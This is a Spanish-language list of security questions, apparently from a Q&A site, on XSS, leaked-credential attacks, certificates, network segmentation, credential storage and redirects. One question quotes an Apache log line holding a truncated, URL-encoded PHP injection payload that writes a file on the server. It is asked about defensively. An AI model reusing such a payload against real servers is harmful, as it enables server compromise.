Todas las preguntas

1
respuesta

prevención XSS protegiendo las cookies localmente

Me preguntaba si había una manera de prevenir XSS creando una capa segura dentro del almacenamiento de cookies en el navegador localmente. O habría alguna forma única de protegerse contra XSS. Sé que probablemente se haya hecho antes, pero soy b...
pregunta 16.09.2017 - 09:56
1
respuesta

¿Hasta qué punto debemos defendernos contra las credenciales filtradas que se están probando contra nuestro sistema?

Vemos este tipo de intentos con cierta frecuencia. Normalmente se ha producido una fuga de algún otro tercero, y un atacante tiene una gran lista de combinaciones conocidas de cuenta + contraseña que pueden probar contra otros sistemas. Luego ll...
pregunta 12.09.2017 - 17:53
1
respuesta

¿Puede Hacker publicar datos a través de la solicitud GET?

Hoy hemos recibido la siguiente solicitud en el archivo de registros de acceso de Apache. "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'S...
pregunta 04.08.2017 - 05:06
2
respuestas

Buscar el nombre de la compañía por la dirección IP de AWS [cerrado]

¿Hay alguna forma de averiguar la compañía / nombre de dominio del nombre de la compañía con una dirección IP de AWS determinada que sea de su propiedad? nslookup y centralops.com solo mostrarán que la IP está en AWS.     
pregunta 05.09.2017 - 19:19
1
respuesta

Certificados OV vs EV

¿dónde está exactamente la diferencia en la validación entre OV y EV? ambos tipos de certificados validan que una empresa existe de alguna manera y eso es todo. Me refiero a que el punto 2.1.3 declara explícitamente que sus EV no son ni...
pregunta 22.09.2017 - 12:33
2
respuestas

¿Cómo pueden los ISP bloquear un contenido específico de un sitio web al usar una conexión cifrada?

Estoy aprendiendo sobre el cifrado y los certificados SSL y me pregunto: Si se usa una conexión cifrada al conectarse a un sitio web utilizando un certificado SSL, ¿cómo puede el ISP / gerente de la empresa / gobierno (quien controla la red)? t...
pregunta 30.07.2017 - 14:01
2
respuestas

La red inalámbrica del huésped está directamente conectada a la LAN interna. ¿Qué tan malo es esto?

En mi trabajo, hay una red inalámbrica que está en la misma subred que los servidores, impresoras y máquinas de los usuarios. Esta red inalámbrica permite a los usuarios tener acceso a unidades de red compartidas como si los usuarios estuvieran...
pregunta 03.08.2017 - 02:08
2
respuestas

¿Las mejores prácticas para proteger contraseñas de DB para múltiples aplicaciones web?

Estoy trabajando en la actualización de una infraestructura "heredada" donde se utilizan algunas aplicaciones de PHP, Rails y Perl (CGI). Históricamente, estas aplicaciones se escribieron con las credenciales de la base de datos en todo el códig...
pregunta 07.09.2017 - 17:38
3
respuestas

¿No es seguro redirigir a la URL del remitente?

¿Es un problema cuando las URL de una aplicación web redirigen a la URL especificada en el encabezado Referer ? No es una redirección abierta como cualquiera de los ejemplos /whatever?url=evil.com que he visto, que pueden explot...
pregunta 10.08.2017 - 01:18
2
respuestas

¿POR QUÉ la represión de VPN por parte de China, Rusia, etc., cuando es posible el análisis del tráfico? [cerrado]

Por lo que últimamente es una noticia general que China y Rusia pronto implementarán una política concreta que prohíbe efectivamente el uso de redes privadas virtuales, No solo para sus respectivos ciudadanos, sino también para los extranjeros q...
pregunta 09.08.2017 - 12:12